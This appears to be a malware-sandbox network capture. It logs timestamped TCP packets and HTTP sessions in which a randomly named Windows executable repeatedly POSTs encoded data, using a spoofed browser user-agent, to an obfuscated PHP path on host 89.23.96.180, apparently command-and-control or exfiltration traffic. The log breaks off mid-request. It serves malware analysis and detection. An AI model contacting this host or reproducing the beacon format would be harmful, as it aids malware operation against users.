                                                                                  Dec 21, 2024 10:04:06.605020046 CET5002580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.605930090 CET805002489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:06.605998039 CET805001889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:06.606008053 CET5002480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.606064081 CET5001880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.606142998 CET5002480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.724992990 CET805002589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:06.725820065 CET805002489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:06.725929976 CET5002580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.726089001 CET5002580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:06.845832109 CET805002589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:06.952985048 CET5002480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:07.072767019 CET805002489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:07.072827101 CET805002489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:07.078032970 CET5002580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:07.198101044 CET805002589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:07.198132992 CET805002589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:07.198185921 CET805002589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:07.770970106 CET804980889.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:07.771058083 CET4980880192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:07.984081030 CET805002489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:08.030965090 CET5002480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.103303909 CET805002589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:08.155972004 CET5002580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.216196060 CET805002489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:08.265358925 CET5002480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.340126991 CET805002589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:08.390355110 CET5002580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.466487885 CET5002480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.466643095 CET5002580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.466905117 CET5003180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.586458921 CET805002489.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:08.586472988 CET805003189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:08.586530924 CET5002480192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.586586952 CET5003180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.586894035 CET5003180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.587162018 CET805002589.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:08.587232113 CET5002580192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:08.706396103 CET805003189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:08.937341928 CET5003180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:09.057082891 CET805003189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:09.057095051 CET805003189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:09.057151079 CET805003189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:09.964426041 CET805003189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:10.015418053 CET5003180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:10.200381994 CET805003189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:10.249725103 CET5003180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:18.871961117 CET5003180192.168.2.589.23.96.180
                                                                                  Dec 21, 2024 10:04:18.991703987 CET805003189.23.96.180192.168.2.5
                                                                                  Dec 21, 2024 10:04:18.991766930 CET5003180192.168.2.589.23.96.180
                                                                                  • 89.23.96.180
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.54973489.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:30.100028038 CET403OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 344
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:30.453583002 CET344OUTData Raw: 05 05 04 0d 06 0e 01 05 05 06 02 01 02 06 01 06 00 05 05 0e 02 00 03 00 00 55 0e 54 04 01 03 50 0f 03 04 0f 03 01 05 00 0d 00 07 57 00 04 02 04 06 06 0d 0f 0e 0e 01 00 07 06 04 02 04 01 07 58 02 01 0d 5d 07 06 04 54 0e 55 0e 0f 0e 02 0e 52 04 04
                                                                                  Data Ascii: UTPWX]TURU\L~A^PMvb_MweT|v^`Rx|ZpylZ^lNe^|mlcwte~V@B{mn~rW
                                                                                  Dec 21, 2024 10:02:31.475451946 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:31.740101099 CET1236INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 35 37 63 0d 0a 56 4a 7e 43 7a 7d 6b 00 7b 4c 64 03 68 5f 5e 5e 7e 64 70 50 7f 06 6a 55 79 4d 5a 07 7d 04 78 05 77 70 69 08 79 07 65 00 61 66 78 00 7d 61 78 01 55 4b 71 42 76 61 77 06 6b 5c 79 07 7c 49 7d 53 79 66 74 41 7e 63 63 49 75 5c 72 5d 77 4f 69 48 6b 71 5f 5c 7e 55 60 0b 7f 64 77 4b 75 5c 7b 06 7c 5c 5b 4a 7d 4e 6a 5e 6c 64 63 5f 78 77 51 59 78 43 63 00 6e 5c 60 4b 7a 73 71 5f 68 59 6c 44 6f 49 74 44 7d 72 52 5b 75 62 7c 03 7a 51 41 5b 6b 5e 6b 52 68 62 65 41 76 52 6b 5c 6f 7c 56 01 77 4e 6e 0d 7a 58 6d 49 7e 6f 7a 04 6c 5f 50 4b 76 63 5e 5f 77 62 7b 5d 77 4f 5c 50 7e 5d 79 5f 77 61 7d 04 61 66 70 09 7f 6f 76 5d 77 6f 60 04 7e 73 6c 01 78 6c 64 5a 6c 63 76 03 7c 6e 70 08 74 67 6c 05 7e 62 65 50 69 53 55 40 6c 0b 7d 5a 7d 61 65 06 7b 5d 46 51 6b 55 6b 52 7f 60 60 42 7d 49 5c 4c 7b 7e 68 5f 7b 71 7b 59 7c 62 7f 01 7e 59 7f 0c 7f 5e 53 08 6d 63 6f 5c 7f 71 64 01 74 70 61 51 7b 5c 79 07 76 76 5a 4b 7c 66 68 4e 7d 48 79 0c 77 62 59 01 7c 5c 75 4c 7f 67 50 0c 78 76 78 41 7e 5d 51 04 75 62 71 07 77 [TRUNCATED]
                                                                                  Data Ascii: 57cVJ~Cz}k{Ldh_^^~dpPjUyMZ}xwpiyeafx}axUKqBvawk\y|I}SyftA~ccIu\r]wOiHkq_\~U`dwKu\{|\[J}Nj^ldc_xwQYxCcn\`Kzsq_hYlDoItD}rR[ub|zQA[k^kRhbeAvRk\o|VwNnzXmI~ozl_PKvc^_wb{]wO\P~]y_wa}afpov]wo`~slxldZlcv|nptgl~bePiSU@l}Z}ae{]FQkUkR``B}I\L{~h_{q{Y|b~Y^Smco\qdtpaQ{\yvvZK|fhN}HywbY|\uLgPxvxA~]QubqwOu~arK}RpgsvOYzriG}^[xgxxg|L{CUy\pxsPp^J{gl~r{Mwq^|l]J|wR}qW@uBlN{RRKt`rNyqWH~lPzqbuMcvOVwOzNv@wbSuep~|Wt|R~cxxRcJ{^fISttg^~rvA}Sc{}f}\i|N`|lp`xB~YfxmQx\p|_sD|wQ^}zc|~r|HwMy@z_qJuH`E|v`M~XqBvbUKLqLYfC{vZB}]kJu\iNtO[aT~|d}wwKuOsH{rmG}NyxYZywR{CQKyrR{MT{]NZ{I]^}\gMbrsZj{KdwSqmvBo[lBs[ccaUmXeH~Bj_z\y\}b`g{ZL~Jx^e_tLT\a[sQ|Bv]`olMh`Dy|lZ{^j}mRc^\ibrzSYQTn^jfzScT`Mjc{HiOBln`GRaIPc`JjdlUPc~OP`sFQa{[cpmnbDZ{ZP\Z^|qrQtbYJ|LaMhY~lfxA~Zh\bqb\ta~X~riXjRVjgsv\{POr^icDT{oZWdSUTdISacKQt~{^^FxwlF~bMt_p|kA{^UTPvJ\o]FWT[Xle}_[YgUe|s_G[ZEZtvXcbNS|eYXaS[\oVPo@pRV\eZo~ZDVY@Z~zsWcdAR~aVRn^VTa [TRUNCATED]
                                                                                  Dec 21, 2024 10:02:31.740257978 CET366INData Raw: 06 5c 4e 56 5c 0c 5d 52 61 60 58 76 5e 7a 77 6e 6d 53 54 6f 65 08 4b 52 4b 78 44 79 5f 5c 54 5b 05 70 40 56 61 54 45 50 5f 0a 53 54 01 6f 4d 57 7f 78 05 69 04 01 5d 63 66 71 06 78 59 65 65 79 51 42 50 6a 01 64 45 5b 72 4a 01 6f 04 54 45 6b 06 76
                                                                                  Data Ascii: \NV\]Ra`Xv^zwnmSToeKRKxDy_\T[p@VaTEP_SToMWxi]cfqxYeeyQBPjdE[rJoTEkvERdU]Uzon]~\ZXc`FVsoXu{jnd[[L|CzUR^PsKVbPIZT\WXcUV[ftQaZ|_\Xl\sZtvXcbNS|eYXaSaMU\@coeZGlk|_EQWkVpvBjn}HjsQyz}Xja@P|gVSo_RswRkeo~gZ
                                                                                  Dec 21, 2024 10:02:31.947110891 CET379OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 384
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:32.296614885 CET384OUTData Raw: 58 5f 43 5f 5d 5b 57 53 55 5e 55 5a 54 5c 50 54 57 58 5c 55 52 53 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: X_C_][WSU^UZT\PTWX\URSQYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-<U%-!?1>._$?9(-V#,6%T6V($ <8X*%!_.#Q,
                                                                                  Dec 21, 2024 10:02:32.406435966 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:32.765929937 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 1e 21 3b 31 54 29 39 28 00 29 3f 2a 55 3e 2e 22 5d 38 1c 33 18 21 2f 39 07 28 3d 2b 10 27 10 38 03 35 04 39 5d 35 2f 33 5e 2a 1b 2e 58 01 1e 22 19 21 20 2d 54 33 11 05 53 29 34 3d 02 29 2e 08 59 26 3f 01 14 25 14 23 05 3c 2a 3c 1c 25 3e 32 5d 2c 01 3f 5f 28 10 37 09 27 36 2b 51 03 1e 26 5d 32 02 23 55 26 23 29 1c 32 10 3e 07 23 10 37 53 3e 38 3f 53 37 5d 21 02 3b 17 06 5d 28 2e 3e 59 3d 38 00 5b 30 2c 28 0c 32 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989!;1T)9()?*U>."]83!/9(=+'859]5/3^*.X"! -T3S)4=).Y&?%#<*<%>2],?_(7'6+Q&]2#U&#)2>#7S>8?S7]!;](.>Y=8[0,(2#T-,H1]V0
                                                                                  Dec 21, 2024 10:02:32.849848986 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:33.203216076 CET2112OUTData Raw: 58 53 43 57 5d 5a 52 57 55 5e 55 5a 54 5c 50 57 57 5d 5c 5b 52 52 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XSCW]ZRWU^UZT\PWW]\[RRQ[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-,V1>%Q?2".#'? U.:4-1&?#]+>++5!_.#Q,
                                                                                  Dec 21, 2024 10:02:33.310826063 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:33.670953989 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 1e 37 15 0f 54 29 3a 02 01 28 2f 04 57 3e 00 08 1b 3b 0b 38 03 22 2f 31 00 2a 2d 05 5f 33 00 05 5d 35 04 2e 04 21 3c 3f 13 3e 0b 2e 58 01 1e 22 1a 34 0a 22 0f 27 2f 30 0e 3d 27 3e 5e 28 07 3e 58 33 3f 37 57 26 3a 37 07 2b 04 0e 51 32 3d 2d 00 2f 06 30 06 3c 07 3c 1d 27 1c 2b 51 03 1e 26 1f 25 05 27 11 25 20 39 1c 32 00 25 5d 37 2e 33 1c 3d 3b 3f 56 23 5d 3a 5e 2f 07 2c 5f 2b 3d 2e 11 29 2b 25 07 33 02 24 09 24 2e 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 9897T):(/W>;8"/1*-_3]5.!<?>.X"4"'/0='>^(>X3?7W&:7+Q2=-/0<<'+Q&%'% 92%]7.3=;?V#]:^/,_+=.)+%3$$.#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.54974189.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:32.562841892 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:32.921731949 CET2536OUTData Raw: 5d 55 43 5f 5d 5d 57 52 55 5e 55 5a 54 58 50 50 57 5e 5c 5d 52 53 51 5d 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]UC_]]WRU^UZTXPPW^\]RSQ]ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#9!%>5>")9,'?8V.+5#)\&1*(''^+=>%!_.#Q,*
                                                                                  Dec 21, 2024 10:02:33.938683987 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:34.174393892 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.54974489.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:34.703413963 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2532
                                                                                  Expect: 100-continue
                                                                                  Dec 21, 2024 10:02:35.062254906 CET2532OUTData Raw: 58 55 43 52 5d 5a 57 55 55 5e 55 5a 54 5b 50 56 57 59 5c 5c 52 52 51 58 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XUCR]ZWUU^UZT[PVWY\\RRQXZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#-(V&=*>!.,$8S.(P4Y%\&T!?' <([+%!_.#Q,*
                                                                                  Dec 21, 2024 10:02:36.079175949 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:36.315866947 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.54975189.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:36.639297009 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:36.984210014 CET2536OUTData Raw: 5d 51 43 54 5d 58 52 53 55 5e 55 5a 54 58 50 56 57 53 5c 5a 52 5e 51 59 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]QCT]XRSU^UZTXPVWS\ZR^QYZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ :,&Q>!)Z,/<X'/;:^> 9['16U<'#?>(>!_.#Q,*
                                                                                  Dec 21, 2024 10:02:38.015741110 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:38.252110004 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.54975789.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:38.631613970 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:38.984097958 CET2536OUTData Raw: 58 52 46 54 58 5d 57 56 55 5e 55 5a 54 5e 50 56 57 5e 5c 59 52 50 51 5c 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: XRFTX]WVU^UZT^PVW^\YRPQ\ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_#,!8%>6=6-/8X0?T:8*4&2<$7<$Z=5!_.#Q,2
                                                                                  Dec 21, 2024 10:02:40.007849932 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:40.244170904 CET200INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 34 0d 0a 3c 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 4<V@[0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.54975889.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:38.807656050 CET404OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 89.23.96.180
                                                                                  Content-Length: 2112
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Dec 21, 2024 10:02:39.156024933 CET2112OUTData Raw: 5d 54 46 54 5d 5f 52 52 55 5e 55 5a 54 5e 50 57 57 59 5c 58 52 5f 51 5b 5a 59 58 5f 51 58 5d 5f 5f 5b 54 5b 5f 5b 53 5c 59 5a 50 5b 54 57 51 58 57 52 5b 49 5d 52 57 50 59 5e 55 52 51 52 5d 5f 50 5b 58 5d 5a 5e 54 51 58 5b 42 5d 41 5b 5a 53 5b 5c
                                                                                  Data Ascii: ]TFT]_RRU^UZT^PWWY\XR_Q[ZYX_QX]__[T[_[S\YZP[TWQXWR[I]RWPY^URQR]_P[X]Z^TQX[B]A[ZS[\X\TZ\\U]VU_VTUPR\Y]]]SXRC\X[_U[^QQF^UV]WYXT^^]P_X\WXX\YX]SX]YQWZUBU^[X]AC[Y_UYDWYS[TVV[]P_T]P\FZZWB_U_ -"/%>!9/+$<,:;*"?>2*+'8(+5!_.#Q,2
                                                                                  Dec 21, 2024 10:02:40.186721087 CET25INHTTP/1.1 100 Continue
                                                                                  Dec 21, 2024 10:02:40.422753096 CET349INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 21 Dec 2024 09:02:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: keep-alive
                                                                                  Vary: Accept-Encoding
                                                                                  Data Raw: 39 38 0d 0a 0e 1e 39 1f 23 3b 2d 11 2b 5c 2f 10 29 3f 22 1f 29 3d 29 04 3b 0b 33 5b 22 12 2a 5f 3e 5b 37 5e 26 3d 37 5d 36 04 2d 5d 20 3c 23 12 3d 0b 2e 58 01 1e 22 1b 34 0a 22 0c 33 01 37 52 2a 27 2d 04 3c 00 39 05 33 2f 24 09 31 2a 19 00 2b 03 27 09 31 04 2e 58 2d 3f 01 10 3f 00 24 55 30 1c 2b 51 03 1e 26 5a 24 2c 2f 52 26 1d 35 1c 32 3e 2d 14 20 3d 2c 0b 29 06 28 0e 34 28 3d 06 2c 2a 2b 01 3c 2d 08 12 2a 16 22 12 33 5a 3c 0c 32 14 23 54 2d 00 2c 48 00 31 5d 56 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 989#;-+\/)?")=);3["*_>[7^&=7]6-] <#=.X"4"37R*'-<93/$1*+'1.X-??$U0+Q&Z$,/R&52>- =,)(4(=,*+<-*"3Z<2#T-,H1]V0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.54976589.23.96.180805148C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 21, 2024 10:02:41.287405968 CET380OUTPOST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1
                                                                                  Content-Type: application/octet-stream
